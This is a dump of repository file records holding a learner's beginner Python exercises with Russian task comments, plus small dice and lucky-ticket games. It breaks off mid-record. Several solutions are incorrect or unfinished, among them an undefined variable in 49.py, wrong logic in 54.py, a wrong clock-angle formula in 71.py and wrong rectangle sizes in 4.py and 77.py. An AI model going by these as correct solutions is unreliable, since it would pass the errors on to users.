"alpha_fraction": 0.6162790656089783,
"alphanum_fraction": 0.6162790656089783,
"avg_line_length": 18.846153259277344,
"blob_id": "d0729def335476abe49af0a1b8baab9a4db5991e",
"content_id": "aad62a12c3281578043c6a9ae51ff591c345f842",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 359,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 13,
"path": "/Practic/Tasks/39.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны два числа. Если первое число больше второго, то вывести yes, иначе поменять значения этих переменных и вывести их на экран\n\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x > y:\n print(\"yes\")\nelse:\n buff = x\n x = y\n y = buff\n print(x,y)\n"
},
{
"alpha_fraction": 0.47711268067359924,
"alphanum_fraction": 0.5950704216957092,
"avg_line_length": 27.350000381469727,
"blob_id": "373eed04be7e0834c650990a474272fe63b99a31",
"content_id": "a6184c4f08dea723e6bef8d08bafe5c4afa2bb74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 568,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 20,
"path": "/Games/lucky ticket.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "import random\ntotal1 = 0\ntotal2 = 1\nquantity = 0\nwhile total1 != total2:\n ticket = random.randint(100000, 999999)\n digit_1 = ticket // 100000\n digit_2 = ticket // 10000 % 10\n digit_3 = ticket // 1000 % 10\n digit_4 = ticket // 100 % 10\n digit_5 = ticket // 10 % 10\n digit_6 = ticket % 10\n total1 = digit_1 + digit_2 + digit_3\n total2 = digit_4 + digit_5 + digit_6\n if total1 == total2:\n print(\"Lucky you, ticket number\", ticket)\n else:\n print(\"Unlucky you, ticket number\", ticket)\n quantity += 1\nprint(quantity+1)\n\n"
},
{
"alpha_fraction": 0.6853147149085999,
"alphanum_fraction": 0.7027971744537354,
"avg_line_length": 16.875,
"blob_id": "690fbf2ff09caf5f1506e441b76ca9e89230c214",
"content_id": "79d480e2e8b8909fa35428131781699a7c20b7d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 16,
"path": "/Practic/Tasks/28.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит сумму вклада в банк и годовой процент.\n#Найдите сумму вклада через 5 лет\n#(рассмотреть два способа начисления процентов)\n\nsum = int(input('money:'))\n\nproz = float(input('proz:'))\n\nyear = 5;\n\nsum_proz = proz / 100 * sum\n\ntotal = sum_proz * year + sum\n\n\nprint(total)\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 27.799999237060547,
"blob_id": "7a38ef431e4acc46f19b68d8c0e6fbf2f74b2a3b",
"content_id": "21ac6e604434057d5307ea17ef24785d0023c56a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 5,
"path": "/Games/bones.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "import random\ndie1 = random.randint(1, 6)\ndie2 = random.randint(1, 6)\ntotal = die1 + die2\nprint(\"bone1:\", die1, \"bone2:\", die2, \"total\", total)\n"
},
{
"alpha_fraction": 0.7534246444702148,
"alphanum_fraction": 0.7534246444702148,
"avg_line_length": 28.200000762939453,
"blob_id": "0a4208ffab044dc7647c741b8fcb1e960e65aba1",
"content_id": "0ff33379cd3cfd104a45374b0c231a0090394112",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 5,
"path": "/Practic/Tasks/33.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите x−y√−−−−−−√, если x и y вводит пользователь.\n# Перед вычислением выполнить проверку на существование\n# квадратных корней.\n\nimport math\n"
},
{
"alpha_fraction": 0.4285714328289032,
"alphanum_fraction": 0.523809552192688,
"avg_line_length": 30.5,
"blob_id": "e98cb6fba1adae705f5361b38025258ff8bea5b7",
"content_id": "4346cf915a85738204959fe48dc71feca3d68148",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 163,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 4,
"path": "/Practic/Tasks/8.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения (a+4b)(a−3b)+a2 при a=2 и b=3. Ответ: -94\na = 2\nb = 3\nprint((a + 4 * b) * (a - 3 * b) + a * 2)\n"
},
{
"alpha_fraction": 0.5654951930046082,
"alphanum_fraction": 0.5942491888999939,
"avg_line_length": 27.454545974731445,
"blob_id": "c97baa71451c123563778478fc730a26dedeaebf",
"content_id": "546b5dd1d923ce7acb51e6e1d97a2f2232d0c57e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 411,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 11,
"path": "/Practic/Tasks/52.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четыре числа, если первые два числа больше 5, третье число делится на 6, четвертое число не делится на 3, то вывести yes, иначе no.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\nv = int(input(\"v:\"))\n\nif x > 5 and y > 5 and z % 6 == 0 and v % 3 != 0:\n print(\"yes\")\nelse:\n print(\"no\")\n"
},
{
"alpha_fraction": 0.570135772228241,
"alphanum_fraction": 0.6063348650932312,
"avg_line_length": 23.55555534362793,
"blob_id": "3f337566b9ff1f1f8c1d02cf7ba96762ef668001",
"content_id": "a1518776f5cb0bf9e8c66738bb91da771d44609f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 9,
"path": "/Practic/Tasks/35.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно меньше 7, то вывести Yes, если больше 10, то вывести No, если равно 9, то вывести Error.\n\nx = int(input(\"x:\"))\nif x < 7:\n print(\"Yes\")\nelif x > 10:\n print(\"No\")\nelif x == 9:\n print(\"Error\")\n"
},
{
"alpha_fraction": 0.5574468374252319,
"alphanum_fraction": 0.5744680762290955,
"avg_line_length": 20.363636016845703,
"blob_id": "8c13265aefe6041e1cf372bf944672a9887be329",
"content_id": "5a6e30897e1982ba256ed7320f917d7a85bbb150",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 291,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 11,
"path": "/Practic/Tasks/54.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано три числа. Если ровно два из них меньше 5, то вывести yes, иначе вывести no.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nif x and y < 5 or x and z < 5 or y and z < 5:\n print(\"Yes\")\n\nelse:\n print(\"No\")\n"
},
{
"alpha_fraction": 0.6204819083213806,
"alphanum_fraction": 0.6325300931930542,
"avg_line_length": 22.714284896850586,
"blob_id": "8698ea13c2b67406049263e1d84ebbc5cd196f61",
"content_id": "bcc564c658ab41036f4eef8bfc1e523977197f03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 7,
"path": "/Practic/Tasks/76.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран n раз фразу \"Silence is golden\". Число n вводит пользователь\n\nn = int(input('n:'))\ni = 0\nwhile i < n:\n i = i + 1\n print(\"Silence is golden\")\n"
},
{
"alpha_fraction": 0.5428571701049805,
"alphanum_fraction": 0.6228571534156799,
"avg_line_length": 20.875,
"blob_id": "d4641aa0334219c45c1a05baecb9dc76c27e670f",
"content_id": "759bd8cf9b41776e40065b5ef340a0ee29b09040",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 241,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 8,
"path": "/Practic/Tasks/40.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно от -10 до 10 не включительно, то увеличить его на 5, иначе уменьшить на 10.\n\nx = int(input(\"x:\"))\n\nif -10 < x < 10:\n print(x+5)\nelse:\n print(x-10)\n"
},
{
"alpha_fraction": 0.6401515007019043,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 25.399999618530273,
"blob_id": "8a6c93ee36dbf4b97e28d1d35a9d2f261a0b1864",
"content_id": "f67ef0b3331f073ed9ae208daac69ca6b8f45614",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 390,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 10,
"path": "/Practic/Tasks/71.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны числа h и m, где h - количество часов, m - количество минут некоторого момента времени. Найдите угол между часовой и минутной стрелками в этот момент времени.\n\nh = int(input(\"h:\"))\nm = int(input(\"m:\"))\n\nm_h = m / 60 + h\n\ngrad = (180 / 12) * m_h\n\nprint(grad)\n"
},
{
"alpha_fraction": 0.6256281137466431,
"alphanum_fraction": 0.7110552787780762,
"avg_line_length": 27.428571701049805,
"blob_id": "7c65579440b469d2aff7c2f333e30d582a2fcdc7",
"content_id": "1e43dcd57bcfe3c49cc0ba2c015ea2945cfd888e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 516,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 14,
"path": "/Practic/Tasks/63.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны два трехзначных числа. Найдите шестизначное число, образованное из двух данных чисел путем дописывания второго числа к первому справа.\n\nvalue = int(input(\"Value:\"))\nvalue1 = int(input(\"Value:\"))\n\ndigit_1 = value // 100\ndigit_2 = value // 10 % 10\ndigit_3 = value % 10\n\ndigit1 = value1 // 100\ndigit2 = value1 // 10 % 10\ndigit3 = value1 % 10\n\nprint(digit_1,digit_2,digit_3,digit1,digit2,digit3)\n"
},
{
"alpha_fraction": 0.5246913433074951,
"alphanum_fraction": 0.5864197611808777,
"avg_line_length": 15.199999809265137,
"blob_id": "70d1a50b659432a5b9e2c880bdccdfd5876d76ad",
"content_id": "e20eda3369a0994181b3067c655b9eac1719bd99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 176,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 10,
"path": "/Practic/Tasks/94.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найдите сумму 1+1/2+1/3+…+1/n.\nfrom fractions import Fraction\nn = int(input(\"n:\"))\nsumm = 0\ni = 1\n\nwhile i <= n:\n summ += Fraction(1, i)\n i+=1\nprint(summ)\n"
},
{
"alpha_fraction": 0.7288135886192322,
"alphanum_fraction": 0.7966101765632629,
"avg_line_length": 58,
"blob_id": "3c8ff85df6936d04cbb141b29cb0199d5174feb1",
"content_id": "61cb55c62648d28a5fc6a0fa563fa50c03f15a68",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 1,
"path": "/Practic/Tasks/96.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано натуральное число n. Вычислите 1cosx+1cosx2+…+1cosxn\n"
},
{
"alpha_fraction": 0.5185185074806213,
"alphanum_fraction": 0.5679012537002563,
"avg_line_length": 19.25,
"blob_id": "c06c63cbc274e922ac9424eab241ae38f73319ae",
"content_id": "4b0cb983b1647bf7401712ff1854df52f2bab15c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 4,
"path": "/Practic/Tasks/9.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите |x|+x**5, если x=−2.\nimport math\nx = -2\nprint (math.fabs(x) + x ** 5)\n"
},
{
"alpha_fraction": 0.5253164768218994,
"alphanum_fraction": 0.5981012582778931,
"avg_line_length": 23.230770111083984,
"blob_id": "2a2de828563b65c0b99e37d5192d798e5bded92f",
"content_id": "cad8a4d419e4e1c9e460decdb74d456c3ad8df79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 414,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/Practic/Tasks/57.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дана дата из трех чисел (день, месяц и год).\n# Вывести yes, если такая дата существует\n# (например, 12 02 1999 - yes, 22 13 2001 - no).\n# Считать, что в феврале всегда 28 дней.\n\nd = int(input(\"d:\"))\nm = int(input(\"m:\"))\ny = int(input(\"y:\"))\n\nif d < 29 and m < 13 and y > 0:\n print(\"Yes\")\nelse:\n print(\"No\")\n\n"
},
{
"alpha_fraction": 0.4624277353286743,
"alphanum_fraction": 0.5664739608764648,
"avg_line_length": 18.22222137451172,
"blob_id": "8dcf423227f5b55aee0e6405a65fdc12af2e021b",
"content_id": "2afe0e38277a975e358f538f603ef13ed067fab4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 9,
"path": "/Practic/Tasks/13.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения x2+b−−−−−√5−b2sin3(x+a)x при a=0.1, b=0.2 и x=1\n\nimport math\n\na = 0.1\nb = 0.2\nx = 1\n\nprint(math.pow(x**2 + b, 5) - (b**2*math.sin(x+a)**3) /x)\n"
},
{
"alpha_fraction": 0.2568093240261078,
"alphanum_fraction": 0.3501945436000824,
"avg_line_length": 14.9375,
"blob_id": "01ccbe4b8faf58ce7f3ecd1c3971c708e14138bd",
"content_id": "af46a267ffd1148f92035807673e2edef16a45b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 16,
"path": "/Practic/Tasks/97.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите 1⋅2+2⋅3⋅4+...+n⋅(n+1)⋅…⋅2n.\n# 2 + 24 + 72 = 98\ni = 0\nn = 4\nsum = 1\nbuf = 0\nwhile i < n:\n i += 1\n\n if i == 1:\n sum = i * (i + 1) * (i)\n buf += sum\n if i > 1:\n sum = i * (i + 1) * (i*2)\n buf += sum\nprint(buf)\n\n\n"
},
{
"alpha_fraction": 0.4895397424697876,
"alphanum_fraction": 0.5271966457366943,
"avg_line_length": 18.1200008392334,
"blob_id": "f9d555d43f3a064eec5fa7fb37132a68cc3e9c7d",
"content_id": "f8d20f1e2caaf786b0fd519f0b7b190cc33544ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 575,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 25,
"path": "/Practic/Tasks/49.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит четыре числа. Найдите наибольшее четное число среди них. Если оно не существует, выведите фразу \"not found\"\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\nv = int(input(\"v:\"))\n\nmaxx = -10000\nif x % 2 == 0:\n if x > maxx:\n maxx = x\nif y % 2 == 0:\n if y > maxx:\n maxx = y\nif z % 2 == 0:\n if z > maxx:\n maxx = z\nif v % 2 == 0:\n if v > maxx:\n maxx = v\nif maxx == -10000:\n print(\"not found\")\n\n\nprint(b)\n"
},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.7060605883598328,
"avg_line_length": 19.625,
"blob_id": "c1c531da1b0062b6aa9d5a198ee12634f8eeaba0",
"content_id": "443a41c2bfa1c789cd633375316586303058bbfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 16,
"path": "/Practic/Tasks/111.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран:\n#AAAAAAAAAAAAAAAA\n#ABBBBBBBBBBBBBBA\n#ABBBBBBBBBBBBBBA\n#ABBBBBBBBBBBBBBA\n#AAAAAAAAAAAAAAAA\n#(количество строк вводит пользователь, ширина прямоугольника в два раза больше высоты)\n\na = int(input(\"a:\")) # высота\nb = a * 2 # ширина\nn = 0\n\nfor i in range(b):\n print(\"A\", end=\"\")\nfor j in range(a):\n print(\"A\")\n"
},
{
"alpha_fraction": 0.7455621361732483,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 55.33333206176758,
"blob_id": "4ab63a0008b6b70afe3599b3552111b2f827a35f",
"content_id": "a4c7f5d95c1e7ae256ca809e92f30ec027600e0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 3,
"path": "/Practic/Tasks/4.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран прямоугольник, заполненный буквами А. Количество строк в прямоугольнике равно 5, количество столбцов равно 8.\nfor i in range(1,9):\n print(\"AAAAAA\")\n"
},
{
"alpha_fraction": 0.6320610642433167,
"alphanum_fraction": 0.6671755909919739,
"avg_line_length": 26.29166603088379,
"blob_id": "d5591ef0eb887e88c61feba3082ef4641e0c650e",
"content_id": "8ac2cb960476bbdb2e419e2e4a887b35ce5cb8e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 972,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 24,
"path": "/Practic/Tasks/98.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Начав тренировки, лыжник в первый день пробежал 10 км.\n# Каждый следующий день он увеличивал пробег на 10% от пробега\n# предыдущего дня. Определите: а) пробег лыжника за второй,\n# третий, ..., десятый день тренировок;\n# б) какой суммарный путь он пробежал за первые 7 дней\n# тренировок. в) суммарный путь за n дней тренировок;\n# г) в какой день ему следует прекратить увеличивать пробег,\n# если он не должен превышать 80 км?\n\nday = int(input(\"day:\")) - 1\n\nfirst_day = 10\nnext_day = 0\ni = 0\nsum = 0\nrez = 10\n\nwhile i < day:\n i+=1\n rez = rez * 0.1 + rez\n sum += rez\nprint(\"rez:\",\"%.1f\" % rez,\"sum:\",sum +10)\nif sum > 80:\n print(day, \"stop\")\n"
},
{
"alpha_fraction": 0.551948070526123,
"alphanum_fraction": 0.6168830990791321,
"avg_line_length": 16.11111068725586,
"blob_id": "94315ecfd4c6ac16b8ca36535f41b253ac3e354f",
"content_id": "825d020042333fd3322ac0217da02446b7d852f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 9,
"path": "/Practic/Tasks/34.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно больше 3, то увеличить число на 10,\n# иначе уменьшить на 10.\n\nx = int(input(\"x:\"))\n\nif x > 3:\n print(x+10)\nelse:\n print(x-10)\n"
},
{
"alpha_fraction": 0.8101266026496887,
"alphanum_fraction": 0.8101266026496887,
"avg_line_length": 78,
"blob_id": "23fbfbffd6c4bb304c903b7b862e21c18afdec6e",
"content_id": "9eb99926d396a05077337eb9405a50a8e1c59ebb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 2,
"path": "/Practic/Tasks/2.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран текущее название дня недели, название месяца и свое имя. Каждое слово должно быть в отдельной строке\nprint(\"Wednesday\\nFebruary\\nYevgen\\n\")\n"
},
{
"alpha_fraction": 0.4803149700164795,
"alphanum_fraction": 0.5196850299835205,
"avg_line_length": 23.190475463867188,
"blob_id": "d7b35a561ceaf8e09829c8c0bc2aae4c3300516c",
"content_id": "714ed0a3bbca8cb6e1397394d8edde93ebf0c271",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 617,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 21,
"path": "/Practic/Tasks/68.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны коэффициенты a,b,c уравнения ax2+bx+c=0. Найти решение. Проверить ответы можно здесь. Как решать квадратные уравнения можно прочитать здесь.\n\nimport math\n\na = float(input(\"a:\"))\nb = float(input(\"b:\"))\nc = float(input(\"c:\"))\n\nd = b ** 2 - 4 * a * c\n\nprint(\"d:\", \"d = %.2f\" % d)\n\nif d == 0:\n x = -b / (2 * a)\n print(\"x = %.2f\" % x)\nif d < 0:\n print(\"not sqrt\")\nif d > 0:\n x1 = (-b + math.sqrt(d)) / (2 * a)\n x2 = (-b - math.sqrt(d)) / (2 * a)\n print(\"x1 = %.2f \\nx2 = %.2f\" % (x1, x2))\n"
},
{
"alpha_fraction": 0.6820809245109558,
"alphanum_fraction": 0.7052023410797119,
"avg_line_length": 27.66666603088379,
"blob_id": "8d78a7e828b149471c277c65240753012c727da5",
"content_id": "2f48da24179aa356d208fff3a6a82f84929fef53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 264,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 6,
"path": "/Practic/Tasks/77.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран прямоугольник из нулей. Количество строк вводит пользователь, количество столбцов равно 5.\n\nb = int(input(\"b:\"))\n\nfor i in range(0,5):\n print(\"0\"* b)\n\n"
},
{
"alpha_fraction": 0.5476190447807312,
"alphanum_fraction": 0.6296296119689941,
"avg_line_length": 24.200000762939453,
"blob_id": "d307d0d7a294f784b61bd3c8b87054df4201385a",
"content_id": "6262078bfc08e8f5af7f1422ecde9d319863520f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 15,
"path": "/Practic/Tasks/61.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четырехзначное число. Определите, есть ли одинаковые цифры в нем.\n\n\nvalue = int(input(\"Value:\"))\n\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\nif digit_1 == digit_2 or digit_1 == digit_3 or digit_1 == digit_4 or digit_2 == digit_3 or digit_2 == digit_4 or digit_3 == digit_4:\n print(\"Yes\")\nelse:\n print(\"no\")\n"
},
{
"alpha_fraction": 0.2849462330341339,
"alphanum_fraction": 0.4139784872531891,
"avg_line_length": 12.214285850524902,
"blob_id": "74a7560137f42d753d6f3888c53124b08cb7e943",
"content_id": "e101a560d8e59d470e21f1ad0b283311040371be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 14,
"path": "/Practic/Tasks/95.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны a и n. Вычислите p=(a+1)**2*(a+2)**2⋅…⋅(a+n)**2\n\n\n#9 * 16 * 25 * 36 = 129600\n\na = 2\nn = 4\ni = 0\nres = 1\nwhile i < n:\n i += 1\n p = (a + i) ** 2\n res = res * p\nprint(res )\n\n"
},
{
"alpha_fraction": 0.3097345232963562,
"alphanum_fraction": 0.3097345232963562,
"avg_line_length": 15.142857551574707,
"blob_id": "f8cdd43f1eab550dca9db337eff6936bf53feb86",
"content_id": "56bb0954664156b5ae8f1a4a91dc82571b3a22ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 7,
"path": "/Practic/Tasks/5.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран букву \"W\" из символов \"*\"\nprint('''\n * * *\n * * * *\n * * * *\n * *\n''')\n"
},
{
"alpha_fraction": 0.3320463299751282,
"alphanum_fraction": 0.5019304752349854,
"avg_line_length": 27.77777862548828,
"blob_id": "5b24558012ec3dbd0bc5a31d04a8177fc095a509",
"content_id": "3674b0bb7fe9586a0cc428a5c599a5dcd3f37664",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 9,
"path": "/Practic/Tasks/102.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран числа от 1000 до 9999 такие, что среди цифр есть цифра 3.\n\nfor i in range(1000, 9999):\n d_1 = i // 1000\n d_2 = i // 100 % 10\n d_3 = i // 10 % 10\n d_4 = i % 10\n if d_1 == 3 or d_2 == 3 or d_3 == 3 or d_4 == 3:\n print(i)\n"
},
{
"alpha_fraction": 0.6906474828720093,
"alphanum_fraction": 0.6906474828720093,
"avg_line_length": 26.799999237060547,
"blob_id": "1395bbca6d22e629ef0255f1936d15ca5f9e060f",
"content_id": "1d629f42ff1508c353b54c0a56e094900f87749e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 5,
"path": "/Practic/Tasks/14.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит два числа. Найдите сумму и произведение данных чисел.\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nprint(a+b)\nprint(a*b)\n"
},
{
"alpha_fraction": 0.5072886347770691,
"alphanum_fraction": 0.5510203838348389,
"avg_line_length": 23.5,
"blob_id": "ec98b6ac6d1ee8f7a4d738922d16937dd4b7aff4",
"content_id": "9b0a72909f281f215789f8c6ef07ffd565b288da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 407,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 14,
"path": "/Practic/Tasks/43.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит номер месяца. Вывести название поры года (весна, лето и т.д.)\n\nx = int(input(\"x:\"))\n\nif x == 12 or x == 1 or x ==2:\n print(\"winter\")\nelif x == 3 or x == 4 or x == 5:\n print(\"spring\")\nelif x == 6 or x == 7 or x == 8:\n print(\"summer\")\nelif x == 9 or x == 10 or x == 11:\n print(\"autumn\")\nelse:\n print(\"error\")\n"
},
{
"alpha_fraction": 0.5555555820465088,
"alphanum_fraction": 0.6078431606292725,
"avg_line_length": 16,
"blob_id": "68ab9baa102d684f260ec33da5097f8c6bc3300e",
"content_id": "99ef37989c20bb1314292b3ffed32289a9b38d30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 9,
"path": "/Practic/Tasks/93.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найдите сумму квадратов первых n натуральных чисел\ni = 0\nsqrtt = 0\nn = int(input(\"n:\"))\nwhile i < n:\n i+=1\n sqrtt += i * i\nprint(sqrtt)\n#1+4+9=14\n"
},
{
"alpha_fraction": 0.5496453642845154,
"alphanum_fraction": 0.5957446694374084,
"avg_line_length": 27.200000762939453,
"blob_id": "612824c11a31110e988128c4b2b2d35ca14f638c",
"content_id": "514aeca1b87dc28d18b9e15c9701b0ac96ffc581",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 10,
"path": "/Practic/Tasks/45.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа. Если все числа больше 10 и первые два числа делятся на 3, то вывести yes, иначе no\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nif x > 10 and y > 10 and z > 10 and x % 3 == 0 and y % 3 == 0:\n print(\"yes\")\nelse:\n print(\"No\")\n"
},
{
"alpha_fraction": 0.6716417670249939,
"alphanum_fraction": 0.7835820913314819,
"avg_line_length": 65.5,
"blob_id": "0cb46a43fa103d61f3bc23e1d85370b96e959936",
"content_id": "2795b3203f8c97752e1e64fbcd0915afd3d6dda0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 215,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 2,
"path": "/Practic/Tasks/3.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран пять строк из нулей, причем количество нулей в каждой строке равно номеру строки.\nprint(\"0\\n00\\n000\\n0000\\n00000\")\n\n"
},
{
"alpha_fraction": 0.5555555820465088,
"alphanum_fraction": 0.6296296119689941,
"avg_line_length": 39.5,
